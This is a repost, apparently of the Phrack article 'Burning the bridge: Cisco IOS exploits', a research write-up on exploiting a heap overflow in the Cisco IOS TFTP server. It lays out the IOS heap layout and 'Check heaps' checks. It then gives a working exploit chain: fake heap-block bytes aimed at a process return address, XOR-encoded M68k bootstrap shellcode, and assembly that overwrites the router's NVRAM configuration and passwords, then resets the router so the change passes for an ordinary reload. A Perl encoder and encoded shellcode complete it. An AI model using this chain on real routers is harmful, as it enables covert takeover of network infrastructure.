天天看點

Burning the bridge: Cisco IOS exploits

+++UPDATE+++

In contrast to what was said before on this topic, there are stack based overflows in Cisco IOS. One of them is the HTTP stack vulnerability (Cisco security notice here), which can be exploited stable using the UDP echo memory leak described here.

Grab the stuff from the download section.

Rant

Until a man is twenty-five, he still thinks, every so often, that under the right circumstances he could be the best hacker in the world. If I moved to a hacking monastery in Europe and studied real hard for ten years or so. If I reverse engineered every fucking piece of server software on the planet. If I stole the source code of every operating system available.

I used to feel that way, too, but then ran into certain people. In a way, this is liberating. I no longer have to worry about trying to be the best hacker in the world. The position is taken. The crowning touch, the one thing that really puts true worldclass besthackerdom totally out of reach, of course, is presented at Black Hat. But well, we show up there anyway.

FX

Wording stolen from Neal Stephenson's "Snow Crash"

Introduction

When trying to write exploits for IOS, you can be pretty sure that whatever you do, the whole system will crash at one time or another. Compared to classic daemon exploitation, this does not leave much room for playing around.

According to Cisco Systems own statement, most bugs in IOS are actually heap problems of one kind or another. Therefore, the following method should help the interested researcher to find ways of exploitation. We are not pretending that this will always work and there could be much more simple ways of doing it - but that's how it works for us.

The Basics

As normal, you need something that overwrites a buffer. There might be ways to deal with off-by-ones and other stuff, but buffer overflows are most common.

Your buffer is probably stored on the heap in IOS. The heap is organized in all kinds of fuzzy ways we don't really know about. The one thing that matters are the heap blocks. These are obviously organized in a doubly-linked list:

+--------------+
 |  BLOCK A     |
 +--------------+
 |  BLOCK B     |
 +--------------+
 |  BLOCK C     |
 +--------------+
       

So, if you overflow a block (BLOCK B), you can write to BLOCK C. Now, BLOCK C can contain anything and exploitation would really depend on that. But, every block contains some management information, which is stored inline.

This is how the header looks like in detail:

|<-  32 bit  ->|
 +--------------+
 | MAGIC        |
 +--------------+
 | PID          |
 +--------------+
 | Somestuff    |
 +--------------+
 | Somestuff    |
 +--------------+
 | Somestuff    |
 +--------------+
 | NEXT BLOCK   |
 +--------------+
 | PREV BLOCK   |
 +--------------+
 | BLOCK SIZE   |
 +--------------+
 | some ref     |
 +--------------+
 |   DATA       |
 |              |
  ....
 |              |
 +--------------+
 | RED ZONE     |
 +--------------+
       

For the most part, the fields titled "Somestuff" are not checked by IOS, so the only thing you don't want to have in there is 0x00.

Some others are required to have certain values:

  • MAGIC has to be 0xAB1234CD
  • RED ZONE has to be 0xFD0110DF
  • NEXT BLOCK is a pointer and my point to the next block in the list
  • PREV BLOCK is a pointer and has to point to the previous block in the list (actually to the NEXT pointer in the previous block), which can be real difficult
  • BLOCK SIZE's MSB (most significant bit) tells IOS, if the block is used or not.

Since the PREV PTR is actually checked real closely, we can not do the normal pointer exchange game. But by placing the destination address in NEXT, we could overflow up to that point and write an uncontrolled value (PREV) at the address NEXT points to.

A free block in IOS has some more overhead. After the normal header, you find:

|<-  32 bit  ->|
 +--------------+
 | MAGIC2       |
 +--------------+
 | Somestuff    |
 +--------------+
 | PADDING      |
 +--------------+
 | PADDING      |
 +--------------+
 | FREE NEXT    |
 +--------------+
 | FREE PREV    |
 +--------------+
       

And here comes the good news: None of these two pointers are checked, when the block before this one is free()d. So, we can put two values in here - one for the destination and the other one being the desired 4-byte number and write arbitrary data to arbitrary memory addresses. But since this is a pointer exchange, the data in both fields has to contain valid memory addresses.

The rest is text book exploitation with some little hassles. We will bring you a tutorial shortly - so long, you can check the example exploit in the download section or check the presentations from Black Hat Briefings 2002 in Las Vegas and DefCon

            ==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x07 of 0x10

|=-------------=[ Burning the bridge: Cisco IOS exploits ]=--------------=|

|=-----------------------------------------------------------------------=|

|=----------------=[ FX of Phenoelit <[email protected]> ]=----------------=|

--[ Contents

  1 - Introduction and Limitations

  2 - Identification of an overflow

  3 - IOS memory layout sniplets

  4 - A free() exploit materializes

  5 - Writing (shell)code for Cisco

  6 - Everything not covered in 1-5

--[ 1 - Introduction and Limitations

This article is to introduce the reader into the fun land of exploiting a

routing device made by Cisco Systems. It is not the final word on this

toppic and merely reflects our research results.

According to Cisco Systems, around 85% of all software issues in IOS are

the direct or indirect result of memory corruptions. By the time of this

writing, yours truly is not aware of one single case, where overflowing

something in Cisco IOS led to a direct overwrite of a return address.

Although there are things like stacks in IOS, it seems to be very uncommon

for IOS coders to use local function buffers. Therefore, most (if not all)

overflows we will encounter are some way or anyother heap based.

As a fellow researcher used to say, bugs are not an unlimited resource.

Especially overflow bugs in Cisco IOS are fairly rare and not easily

compared to each other. This article will therefore limit the discussion

to one particular bug: the Cisco IOS TFTP server filename overflow. When

using your router as a TFTP server for files in the flash filesystem, a

TFTP GET request with a long (700 characters) filename will cause the

router to crash. This happens in all IOS versions from 11.1 to 11.3. The

reader might argue the point that this is no longer a widely used branch,

but yours truly asks you to bare with him to the end of this article.

The research results and methods presented here were collected during

inspection and exploitation attempts using the already mentioned TFTP bug.

By the time of this writing, other bugs are researched and different

approaches are tested, but the here presented procedure is still seen as

the most promising for widespread use. This translates to: use your

favorite private Cisco IOS overflow and try it.

--[ 2 - Identification of an overflow

While the reader is probably used to identify stack smashing in a split

second on a commonly used operating system, he might have difficulties

identifying an overflow in IOS. As yours truly already mentioned, most

overflows are heap based. There are two different ways in IOS to identify

a heap overflow when it happens. Being connected to the console, the

reader might see output like this:

01:14:16: %SYS-3-OVERRUN: Block overrun at 2C01E14 (red zone 41414141)

-Traceback= 80CCC46 80CE776 80CF1BA 80CF300

01:14:16: %SYS-6-MTRACE: mallocfree: addr, pc

  20E3ADC,80CA1D8   20DFBE0,80CA1D8   20CF4FC,80CA1D8   20C851C,80CA1D8

  20C6F20,80CA1D8   20B43FC,80CA1D8   20AE130,80CA1D8   2075214,80CA1D8

01:14:16: %SYS-6-MTRACE: mallocfree: addr, pc

  20651E0,80CA1D8   205EF04,80CA1D8   205B338,80CA1D8   205AB80,80CA1D8

  20AFCF8,80CA1C6   205A664,80CA1D8   20AC56C,80CA1C6   20B1A88,80CA1C6

01:14:16: %SYS-6-BLKINFO: Corrupted redzone blk 2C01E14, words 382,

  alloc 80ABBFC, InUse, dealloc 206E2F0, rfcnt 1

In this case, an IOS process called "Check heaps", of which we will hear

a lot more later, has identified a problem in the heap structures. After

doing so, "Check heaps" will cause what we call a software forced crash.

It means that the process kills the Cisco and makes it reboot in order

to get rid of the problem. We all know this behavior from users of

MS-DOS or Windows based systems. What happend here is that an A-Strip

overwrote a boundary between two heap memory blocks. This is protected by

what Cisco calls a "RED ZONE", which in fact is just a static canary.

The other way a heap overflow could manifest itself on your console is an

access violation:

*** BUS ERROR ***

access address = 0x5f227998

program counter = 0x80ad45a

status register = 0x2700

vbr at time of exception = 0x4000000

special status word = 0x0045

faulted cycle was a longword read

This is the case when you are lucky and half of the work is already done.

IOS used a value that you somehow influenced and referenced to not

readable memory.  Unfortunately, those overflows are later harder to

exploit, since tracking is a lot more difficult.

At this point in time, you should try to figure out under which exact

circumstances the overflow happens - pretty much like with every other bug

you find. If the lower limit of your buffer size changes, try to make sure

that you don't play with the console or telnet(1) connections to the router

during your tests. The best is always to test the buffer length with a just

rebooted router. While it doesn't change much for most overflows, some

react differently when the system is freshly rebooted compared to a system

in use.

--[ 3 - IOS memory layout sniplets

To get any further with the overflow, we need to look at the way IOS

organizes memory. There are basically two main areas in IOS: process memory

and IO memory. The later is used for packet buffers, interface ring buffers

and so on and can be of interest for exploitation but does not provide some

of the critical things we are looking for. The process memory on the other

hand behaves a lot like dynamic heap memory in Linux.

Memory in IOS is split up in blocks. There seems to be a number of pointer

tables and meta structures dealing with the memory blocks and making sure

IOS can access them in an efficient way. But at the end of the day, the

blocks are hold together in a linked list structure and store their

management information mostly inline. This means, every memory block has

a header, which contains information about the block, it's previous one

and the next one in the list.

     +--------------+

.-- | Block A      | <-.

|   +--------------+   |

+-> | Block B      | --+

     +--------------+

     | Block C      |

     +--------------+

The command "show memory processor" clearly shows the linked list

structure.

A memory block itself consists of the block header with all the inline

management information, the data part where the actual data is stored

and the red zone, which we already encountered. The format is as follows:

|<-  32 bit  ->|        Comment

+--------------+

| MAGIC        |        Static value 0xAB1234CD

+--------------+

| PID          |        IOS process ID

+--------------+

| Alloc Check  | Area the allocating process uses for checks

+--------------+

| Alloc name   |        Pointer to string with process name

+--------------+

| Alloc PC     | Code address that allocated this block

+--------------+

| NEXT BLOCK   |        Pointer to the next block

+--------------+

| PREV BLOCK   |        Pointer to the previous block

+--------------+

| BLOCK SIZE   |        Size of the block (MSB marks "in use")

+--------------+

| Reference #  |        Reference count (again ???)

+--------------+

| Last Deallc  | Last deallocation address

+--------------+

|   DATA       |

|              |

....

|              |

+--------------+

| RED ZONE     |        Static value 0xFD0110DF

+--------------+

In case this memory block is used, the size field will have it's most

significant bit set to one. The size is represented in words (2 bytes),

and does not include the block overhead. The reference count field is

obviously designed to keep track of the number of processes using this

block, but yours truly has never seen this being something else then 1

or 0. Also, there seem to be no checks for this field in place.

In case the memory block is not used, some more management data is

introduced at the point where the real data was stored before:

| [BLOCK HEAD] |

+--------------+

| MAGIC2       |        Static value 0xDEADBEEF

+--------------+

| Somestuff    |

+--------------+

| PADDING      |

+--------------+

| PADDING      |

+--------------+

| FREE NEXT    |        Pointer to the next free block

+--------------+

| FREE PREV    |        Pointer to the previous free block

+--------------+

|              |

....

|              |

+--------------+

| RED ZONE     |        Static value 0xFD0110DF

+--------------+

Therefore, a free block is an element in two different linked lists:

One for the blocks in general (free or not), another one for the list of

free memory blocks. In this case, the reference count will be zero and

the MSB of the size field is not set. Additionally, if a block was used

at least once, the data part of the block will be filled with 0x0D0D0D0D.

IOS actually overwrites the block data when a free() takes place to prevent

software issues from getting out of hand.

At this point, yours truly would like to return to the toppic of the "Check

heaps" process. It is here to run about once a minute and checks the doubly

linked lists of blocks. It basically walks them down from top to buttom to

see if everything is fine. The tests employed seem to be pretty extensive

compared to common operating systems such as Linux. As far as yours truly

knows, this is what it checks:

1) Doest the block being with MAGIC (0xAB1234CD)?

2) If the block is in use (MSB in size field is set), check if the

   red zone is there and contains 0xFD0110DF.

3) Is the PREV pointer not NULL?

4) If there is a NEXT pointer ...

4.1) Does it point right after the end of this block?

4.2) Does the PREV pointer in the block pointed to by NEXT point

     back to this block's NEXT pointer?

5) If the NEXT pointer is NULL, does this block end at a memory

   region/pool boundary [NOTE: not sure about this one].

6) Does the size make sense? [NOTE: The exact test done here is

   still unknown]

If one of these tests is not satisfied, IOS will declare itself unhappy and

perform a software forced crash. To some extend, one can find out which

test failed by taking a look at the console output line that says

"validblock_diagnose = 1". The number indicates what could be called "class

of tests", where 1 means that the MAGIC was not correct, 3 means that the

address is not in any memory pool and 5 is really a bunch of tests but

mostly indicates that the tests lined out in point 4.1 and 4.2 failed.

--[ 4 - A free() exploit materializes

Now that we know a bit about the IOS memory structure, we can plan to

overflow with some more interesting data than just 0x41. The basic idea is

to overwrite the next block header, hereby provide some data to IOS, and

let it work with this data in a way that gives us control over the CPU. How

this is usually done is explained in [1]. The most important difference

here is, that we first have to make "Check heaps" happy. Unfortunately,

some of the checks are also performed when memory is allocated or free()ed.

Therefore, slipping under the timeline of one minute between two "Check

heaps" runs is not an option here.

The biggest problems are the PREV pointer check and the size field. Since

the vulnerability we are working with here is a string overflow, we also

have the problem of not being able to use 0x00 bytes. Let's try to deal

with the issues we have one by one.

The PREV pointer has to be correct. Yours truly has not found any way to

use arbitrary values here. The check outlined in the checklist as 4.2 is a

serious problem, since it is done on the block we are sitting in - not the

one we are overflowing. To illustrate the situation:

     +--------------+

     | Block Head   |

     ...

     | AAAAAAAAAAAA |    <--- You are here

     | AAAAAAAAAAAA |

     | AAAAAAAAAAAA |

     +--------------+

     | RED ZONE     |    <--- Your data here

     +==============+

     | Block Head   |

     ...

We will call the uppermost block, who's data part we are overflowing, the

"host block", because it basically "hosts" our evildoing. For the sake of

clarity, we will call the overwritten block header the "fake block", since

we try to fake it's contents.

So, when "Check heaps" or comparable checks during malloc() and free() are

performed on our host block, the overwrite is already noticed. First of

all, we have to append the red zone canary to our buffer. If we overflow

exactly with the number of bytes the buffer can hold and append the red

zone dword 0xFD0110DF, "Check heaps" will not complain. From here one, it's

fair game up to the PREV ptr - because the values are either static (MAGIC)

or totally ignored (PID, Alloc ptrs).

Assumed we overwrite RED ZONE, MAGIC, PID, the three Alloc pointer, NEXT

and PREV, a check performed on the host block will already trigger a

software forced crash, since the PREV pointer we overwrote in the next

block does not point back to the host block. We have only one way today to

deal with this issue: we crash the device. The reason behind this is, that

we put it in a fairly predictable memory state. After a reboot, the memory

is more or less structured the same way. This also depends on the amount

of memory available in the device we are attacking and it's certainly not a

good solution. When crashing the device the first time with an A-Strip, we

can try to grab logging information off the network or the syslog server if

such a thing is configured. Yours truly is totally aware of the fact that

this prevents real-world application of the technique. For this article,

let's just assume you can read the console output.

Now that we know the PREV pointer to put into the fake block, let's go on.

For now ignoring the NEXT pointer, we have to deal with the size field. The

fact that this is a 32bit field and we are doing a string overflow prevents

us from putting reasonable numbers in there. The smallest number for a used

block would be 0x80010101 and for an unused one 0x01010101. This is much

more than IOS would accept. But to make a long story short, putting

0x7FFFFFFF in there will pass the size field checks. As simple as that.

In this particular case, as with many application level service overflows

in IOS, our host block is one of the last blocks in the chain. The most

simple case is when the host block is the next-to-last block. And viola,

this is the case with the TFTP server overflow. In other cases, the attack

involves creating more than one fake block header and becomes increasingly

complicated but not impossible. But from this point on, the discussion is

pretty much centered around the specific bug we are dealing with.

Assumed normal operation, IOS will allocate some block for storing the

requested file name. The block after that is the remaining free memory.

When IOS is done with the TFTP operation, it will free() the block it just

allocated. Then, it will find out that there are two free blocks - one

after the other - in memory. To prevent memory fragmentation (a big problem

on heavy load routers), IOS will try to coalesce (merge) the free blocks

into one. By doing so, the pointers for the linked lists have to be

adjusted. The NEXT and PREV pointers of the block before that and the block

after that (the remaining free memory) have to be adjusted to point to each

other. Additionally, the pointers in the free block info FREE NEXT and FREE

PREV have to be adjusted, so the linked list of free blocks is not broken.

Out of the sudden, we have two pointer exchange operations that could

really help us. Now, we know that we can not choose the pointer in PREV.

Although, we can choose the pointer in NEXT, assumed that "Check heaps"

does not fire before our free() tok place, this only allowes us to write

the previous pointer to any writable location in the routers memory. Being

usefull by itself, we will not look deeper into this but go on to the FREE

NEXT and FREE PREV pointers. As the focused reader surely noticed, these

two pointers are not validated by "Check heaps".

What makes exploitation of this situation extremely convenient is that

fact, that the pointer exchange in FREE PREV and FREE NEXT only relies on

the values in those two fields. What happens during the merge operation is

this:

+ the value in FREE PREV is written to where FREE NEXT points to

  plus an offset of 20 bytes

+ the value in FREE NEXT is written to where FREE PREV points to

The only thing we need now is a place to write a pointer to. As with many

other pointer based exploits, we are looking for a fairly static location

in memory to do this. Such a static location (changes per IOS image) is the

process stack of standard processes loaded right after startup. But how do

we find it?

In the IOS memory list, there is an element called the "Process Array".

This is a list of pointers - one for every process currently running in

IOS. You can find it's location by issuing a "show memory processor

allocating-process" command (output trimmed):

radio#show memory processor allocating-process

          Processor memory

Address Bytes Prev.   Next    Ref  Alloc Proc Alloc PC  What

258AD20   1504 0       258B32C   1  *Init*     20D62F0   List Elements

258B32C   3004 258AD20 258BF14   1  *Init*     20D6316   List

...

258F998   1032 258F914 258FDCC   1  *Init*     20E5108   Process Array

258FDCC   1000 258F998 25901E0   1  Load Meter 20E54BA   Process Stack

25901E0    488 258FDCC 25903F4   1  Load Meter 20E54CC   Process

25903F4    128 25901E0 25904A0   1  Load Meter 20DD1CE   Process Events

This "Process Array" can be displayed by the "show memory" command:

radio#show memory 0x258F998

0258F990:                   AB1234CD FFFFFFFE          +.4M...~

0258F9A0: 00000000 020E50B6 020E5108 0258FDCC  ......P6..Q..X}L

0258F9B0: 0258F928 80000206 00000001 020E1778  .Xy(...........x

0258F9C0: 00000000 00000028 02590208 025D74C0  .......(.Y...][email protected]

0258F9D0: 02596F3C 02598208 025A0A04 025A2F34  .Yo<.Y...Z...Z/4

0258F9E0: 025AC1FC 025BD554 025BE920 025BFD2C  .ZA|.[UT.[i .[},

0258F9F0: 025E6FF0 025E949C 025EA95C 025EC484  .^op.^...^)/.^D.

0258FA00: 025EF404 0262F628 026310DC 02632FD8  .^t..bv(.c./.c/X

0258FA10: 02634350 02635634 0263F7A8 026418C0  .cCP.cV4.cw([email protected]

0258FA20: 026435FC 026475E0 025D7A38 026507E8  .d5|.du`.]z8.e.h

0258FA30: 026527DC 02652AF4 02657200 02657518  .e'/.e*t.er..eu.

0258FA40: 02657830 02657B48 02657E60 0269DCFC  .ex0.e{H.e~`.i/|

0258FA50: 0269EFE0 026A02C4 025DD870 00000000  .io`.j.D.]Xp....

0258FA60: 00000000 025C3358 026695EC 0266A370  ...../3X.f.l.f#p

While you also see the already discussed block header format in action now,

the interesting information starts at 0x0258F9C4. Here, you find the number

of processes currently running on IOS. They are ordered by their process

ID. What we are looking for is a process that gets executed every once in a

while. The reason for this is, if we modify something in the process data

structures, we don't want the process being active at this point in time,

so that the location we are overwriting is static. For this reason, yours

truly picked the "Load Meter" process, which is there to measure the system

load and is fired off about every 30 seconds. Let's get the PID of

"Load Meter":

radio#show processes cpu

CPU utilization for five seconds: 2%/0%; one minute: 3%; five minutes: 3%

PID  Runtime(ms)  Invoked  uSecs    5Sec   1Min   5Min TTY Process

   1          80      1765     45   0.00%  0.00%  0.00%   0 Load Meter

Well, conveniently, this process has PID 1. Now, we check the memory

location the "Process Array" points to. Yours truly calls this memory

location "process record", since it seems to contain everything IOS needs

to know about the process. The first two entries in the record are:

radio#sh mem 0x02590208

02590200:                   0258FDF4 025901AC          .X}t.Y.,

02590210: 00001388 020E488E 00000000 00000000  ......H.........

02590220: 00000000 00000000 00000000 00000000  ................

The first entry in this record is 0x0258FDF4, which is the process stack.

You can compare this to the line above that says "Load Meter" and "Process

Stack" on it in the output of "show memory processor allocating-process".

The second element is the current stack pointer of this process

(0x025901AC). By now it should also be clear why we want to pick a process

with low activity. But surprisingly, the same procedure also works quite

well with busier processes such as "IP Input". Inspecting the location of

the stack pointer, we see something quite familiar:

radio#sh mem 0x025901AC

025901A0:                            025901C4              .Y.D

025901B0: 020DC478 0256CAF8 025902DE 00000000  ..Dx.VJx.Y.^....

This is classic C calling convention: first we find the former frame

pointer and then we find the return address. Therefore, 0x025901B0 is the

address we are targeting to overwrite with a pointer supplied by us.

The only question left is: Where do we want the return address to point to?

As already mentioned, IOS will overwrite the buffer we are filling with

0x0D0D0D0D when the free() is executed - so this is not a good place to

have your code in. On the other hand, the fake block's data section is

already considered clean from IOS's point of view, so we just append our

code to the fake block header we already have to send. But what's the

address of this? Well, since we have to know the previous pointer, we can

calculate the address of our code as offset to this one - and it turns out

that this is actually a static number in this case. There are other, more

advanced methods to deliver the code to the device, but let's keep focused.

The TFTP filename we are asking for should now have the form of:

+--------------+

| AAAAAAAAAAAA |

...

| AAAAAAAAAAAA |

+--------------+

| FAKE BLOCK   |

|              |

....

|              |

+--------------+

| CODE         |

|              |

....

+--------------+

At this point, we can build the fake block using all the information we

gathered:

    char                fakeblock[] =

        "/xFD/x01/x10/xDF"      // RED

        "/xAB/x12/x34/xCD"      // MAGIC

        "/xFF/xFF/xFF/xFF"      // PID

        "/x80/x81/x82/x83"      //

        "/x08/x0C/xBB/x76"      // NAME

        "/x80/x8a/x8b/x8c"      //

        "/x02/x0F/x2A/x04"      // NEXT

        "/x02/x0F/x16/x94"      // PREV

        "/x7F/xFF/xFF/xFF"      // SIZE

        "/x01/x01/x01/x01"      //

        "/xA0/xA0/xA0/xA0"      // padding

        "/xDE/xAD/xBE/xEF"      // MAGIC2

        "/x8A/x8B/x8C/x8D"      //

        "/xFF/xFF/xFF/xFF"      // padding

        "/xFF/xFF/xFF/xFF"      // padding

        "/x02/x0F/x2A/x24"      // FREE NEXT (in BUFFER)

        "/x02/x59/x01/xB0"      // FREE PREV (Load Meter return addr)

        ;

When sending this to the Cisco, you are likely to see something like this:

*** EXCEPTION ***

illegal instruction interrupt

program counter = 0x20f2a24

status register = 0x2700

vbr at time of exception = 0x4000000

depending on what comes after your fake block header. Of course, we did not

provide code for execution yet. But at this point in time, we got the CPU

redirected into our buffer.

--[ 5 - Writing (shell)code for Cisco

Before one can write code for the Cisco platform, you have to decide on the

general processor architecture you are attacking. For the purpose of this

paper, we will focus on the lower range devices running on Motorola 68k

CPUs.

Now the question is, what do you want to do with your code on the system.

Classic shell code design for commonly used operating system platforms uses

syscalls or library functions to perform some port binding and provide

shell access to the attacker. The problem with Cisco IOS is, that we will

have a hard time keeping it alive after we performed our pointer games.

This is because in contrast to "normal" daemons, we destroyed the memory

management of the operating system core and we can not expect it to cope

with the mess we left for it.

Additionally, the design of IOS does not feature transparent syscalls as

far as yours truly knows. Because of it's monolithic design, things are

linked together at build time. There might be ways to call different

subfunctions of IOS even after an heap overflow attack, but it appears to

be an inefficient route to take for exploitation and would make the whole

process even more instable.

The other way is to change the routers configuration and reboot it, so it

will come up with the new config, which you provided. This is far more

simpler than trying to figure out syscalls or call stack setups. The idea

behind this approach is, that you don't need any IOS functionality anymore.

Because of this, you don't have to figure out addresses and other vital

information about the IOS. All you have to know is which NVRAM chips are

used in the box and where there are mapped. This might sound way more

complicated than identifying functions in an IOS image - but is not. In

contrast to common operating systems on PC platforms, where the number of

possible hardware combinations and memory mappings by far exceedes a

feasable mapping range, it's the other way around for Cisco routers. You

can have more than ten different IOS images on a single platform - and this

is only one branch - but you always have the same general memory layout and

the ICs don't change for the most part. The only thing that may differ

between two boxes are the modules and the size of available memory (RAM,

NVRAM and Flash), but this is not of big concern for us.

The non-volatile random access memory (NVRAM) stores the configuration of a

Cisco router in most cases. The configuration itself is stored in plain

text as one continious C-style string or text file and is terminated by the

keyword 'end' and one or more 0x00 bytes. A header structure contains

information like the IOS version that created this configuration, the size

of it and a checksum. If we replace the config on the NVRAM with our own

and calculate the numbers for the header structure correctly, the router

will use our IP addresses, routings, access lists and (most important)

passwords next time it reloads.

As one can see on the memory maps [2], there are one (in the worst case

two) possible memory addresses for the NVRAM for each platform. Since

the NVRAM is mapped into the memory just like most memory chips are, we

can access it with simple memory move operations. Therefore, the only thing

we need for our "shell" code is the CPU (M68k), it's address and data bus

and the cooperation of the NVRAM chip.

There are things to keep in mind about NVRAM. First of all, it's slow to

write to. The Xicor chips yours truly encountered on Cisco routers require

that after a write, the address lines are kept unchanged for the time the

chip needs to write the data. A control register will signal when the write

operation is done. Since the location of this control register is not known

and might not be the same for different types of the same platform, yours

truly prefers to use delay loops to give the chip time to write the data -

since speed is not the attackers problem here.

Now, that we know pretty much what we want to do, we can go on and look at

the "how" part of things. First of all, you need to produce assembly for

the target platform. A little known fact is, that IOS is actually build (at

least some times) using GNU compilers. Therefore, the binutils[3] package

can be compiled to build Cisco compatible code by setting the target

platform for the ./configure run to --target=m68k-aout. When you are done,

you will have a m68k-aout-as binary, which can produce your code and a

m68k-aout-objdump to get the OP code values.

In case the reader is fluent in Motorola 68000 assembly, I would like to

apologize for the bad style, but yours truly grew up on Intel.

Optimizations and style guides are welcome. Anyway, let's start coding.

For a string overflow scenario like this one, the recommended way for small

code is to use self-modification. The main code will be XOR'd with a

pattern like 0x55 or 0xD5 to make sure that no 0x00 bytes show up. A

bootstrap code will decode the main code and pass execution on to it. The

Cisco 1600 platform with it's 68360 does not have any caching issues to

worry us (thanks to LSD for pointing this out), so the only issue we have

is avoiding 0x00 bytes in the bootstrap code. Here is how it works:

--- bootstrap.s ---

.globl _start

_start:

        | Remove write protection for NVRAM.

| Protection is Bit 1 in BR7 for 0x0E000000

        move.l  #0x0FF010C2,%a1

        lsr     (%a1)

        | fix the brance opcode

| 'bne decode_loop' is OP code 0x6600 and this is bad

        lea     broken_branch+0x101(%pc),%a3

        sub.a   #0x0101,%a3

        lsr     (%a3)

        | perform dummy load, where 0x01010101 is then replaced

        | by our stack ptr value due to the other side of the pointer

| exchange

        move.l  #0x01010101,%d1

        | get address of the real code appended plus 0x0101 to

| prevent 0x00 bytes

        lea     xor_code+0x0101(%pc),%a2

        sub.a   #0x0101,%a2

        | prepare the decode register (XOR pattern)

        move.w  #0xD5D5,%d1

decode_loop:

| Decode our main payload code and the config

        eor.w   %d1,(%a2)+

| check for the termination flag (greetings to Bine)

        cmpi.l  #0xCAFEF00D,(%a2)

broken_branch:

        | this used to be 'bne decode_loop' or 0x6600FFF6

        .byte   0xCC,0x01,0xFF,0xF6

xor_code:

--- end bootstrap.s ---

You may assemble the code into an object file using:

linux# m68k-aout-as -m68360 -pic --pcrel -o bootstrap.o bootstrap.s

There are a few things to say about the code. Number one are the first two

instructions. The CPU we are dealing with supports write protection for

memory segments [4]. Information about the memory segments is stored in

so-called "Base Registers", BR0 to BR7. These are mapped into memory at

0x0FF00000 and later. The one we are interested in (BR7) is at 0x0FF010C2.

Bit0 tells the CPU if this memory is valid and Bit1 if it's write

protected, so the only thing we need to do is to shift the lower byte one

Bit to the right. The write protection Bit is cleared and the valid Bit is

still in place.

The second thing of mild interest is the broken branch code, but the

explaination in the source should make this clear: the OP code of "BNE"

unfortunately is 0x6600. So we shift the whole first word one to the right

and when the code runs, this is corrected.

The third thing is the dummy move to d1. If the reader would refer back to

the place we discussed the pointer exchange, he will notice that there is a

"back" part in this operation: namely the stack address is written to our

code plus 20 bytes (or 0x14). So we use a move operation that translates to

the OP code of 0x223c01010101, located at offset 0x12 in our code. After

the pointer exchange takes place, the 0x01010101 part is replaced by the

pointer - which is then innocently moved to the d1 register and ignored.

When this code completed execution, the appended XOR'd code and config

should be in memory in all clear text/code. The only thing we have to do

now is copy the config in the NVRAM. Here is the appropriate code to do

this:

--- config_copy.s ---

        .globl  _start

_start:

| turn off interrupts

        move.w #0x2700,%sr;

move.l #0x0FF010C2,%a1

move.w #0x0001,(%a1)

| Get position of appended config and write it with delay

lea config(%pc),%a2

move.l #0x0E0002AE,%a1

move.l #0x00000001,%d2

copy_confg:

move.b (%a2)+,(%a1)+

| delay loop

move.l #0x0000FFFF,%d1

  write_delay:

  subx %d2,%d1

  bmi write_delay

cmp.l #0xCAFEF00D,(%a2)

bne copy_confg

| delete old config to prevent checksum errors

delete_confg:

move.w #0x0000,(%a1)+

move.l #0x0000FFFF,%d1

| delay loop

  write_delay2:

  subx %d2,%d1

  bmi write_delay2

cmp.l #0x0E002000,%a1

blt delete_confg

|  perform HARD RESET

CPUReset:

        move.w #0x2700,%sr

        moveal #0x0FF00000,%a0

        moveal (%a0),%sp

        moveal #0x0FF00004,%a0

        moveal (%a0),%a0

        jmp (%a0)

config:

--- end config_copy.s ---

There is no particular magic about this part of the code. The only thing

worth noticing is the final CPU reset. There is reason why we do this. If

we just crash the router, there might be exception handlers in place to

save the call stack and other stuff to the NVRAM. This might change

checksums in an unpredictable way and we don't want to do this. The other

reason is, that a clean reset makes the router look like it was rebooted by

an administrator using the "reload" command. So we don't raise any

questions despite the completely changed configuration ;-)

The config_copy code and the config itself must now be XOR encoded with the

pattern we used in the bootstrap code. Also, you may want to put the code

into a nice char array for easy use in a C program. For this, yours truly

uses a dead simple but efficient Perl script:

--- objdump2c.pl ---

#!/usr/bin/perl

$pattern=hex(shift);

$addressline=hex(shift);

while (<STDIN>) {

    chomp;

    if (/[0-9a-f]+:/t/) {

(undef,$hexcode,$mnemonic)=split(//t/,$_);

$hexcode=~s/ //g;

$hexcode=~s/([0-9a-f]{2})/$1 /g;

$alc=sprintf("%08X",$addressline);

$addressline=$addressline+(length($hexcode)/3);

@bytes=split(/ /,$hexcode);

$tabnum=4-(length($hexcode)/8);

$tabs="/t"x$tabnum;

$hexcode="";

foreach (@bytes) {

$_=hex($_);

$_=$_^$pattern if($pattern);

$hexcode.=sprintf("//x%02X",$_);

}

print "/t/"".$hexcode."/"".$tabs."//".$mnemonic." (0x".$alc.")/n";

    }

}

--- end objdump2c.pl ---

You can use the output of objdump and pipe it into the script. If the

script got no parameter, it will produce the C char string without

modifications. The first optional paramter will be your XOR pattern and the

second one can be the address your buffer is going to reside at. This makes

debugging the code a hell of a lot easier, because you can refer to the

comment at the end of your C char string to find out which command made the

Cisco unhappy.

The output for our little config_copy.s code XOR'd with 0xD5 looks like

this (trimmed for phrack):

linux# m68k-aout-objdump -d config_copy.o |

> ./objdump2XORhex.pl 0xD5 0x020F2A24

"/x93/x29/xF2/xD5"              //movew #9984,%sr (0x020F2A24)

"/xF7/xA9/xDA/x25/xC5/x17"      //moveal #267391170,%a1 (0x020F2A28)

"/xE7/x69/xD5/xD4"              //movew #1,%[email protected] (0x020F2A2E)

"/x90/x2F/xD5/x87"              //lea %[email protected](62 <config>),%a2 (0x020F2A32)

"/xF7/xA9/xDB/xD5/xD7/x7B"      //moveal #234881710,%a1 (0x020F2A36)

"/xA1/xD4"                      //moveq #1,%d2 (0x020F2A3C)

"/xC7/x0F"                      //moveb %[email protected]+,%[email protected]+ (0x020F2A3E)

"/xF7/xE9/xD5/xD5/x2A/x2A"      //movel #65535,%d1 (0x020F2A40)

"/x46/x97"                      //subxw %d2,%d1 (0x020F2A46)

"/xBE/xD5/x2A/x29"              //bmiw 22 <write_delay> (0x020F2A48)

"/xD9/x47/x1F/x2B/x25/xD8"      //cmpil #-889262067,%[email protected] (0x020F2A4C)

"/xB3/xD5/x2A/x3F"              //bnew 1a <copy_confg> (0x020F2A52)

"/xE7/x29/xD5/xD5"              //movew #0,%[email protected]+ (0x020F2A56)

"/xF7/xE9/xD5/xD5/x2A/x2A"      //movel #65535,%d1 (0x020F2A5A)

"/x46/x97"                      //subxw %d2,%d1 (0x020F2A60)

"/xBE/xD5/x2A/x29"              //bmiw 3c <write_delay2> (0x020F2A62)

"/x66/x29/xDB/xD5/xF5/xD5"      //cmpal #234889216,%a1 (0x020F2A66)

"/xB8/xD5/x2A/x3D"              //bltw 32 <delete_confg> (0x020F2A6C)

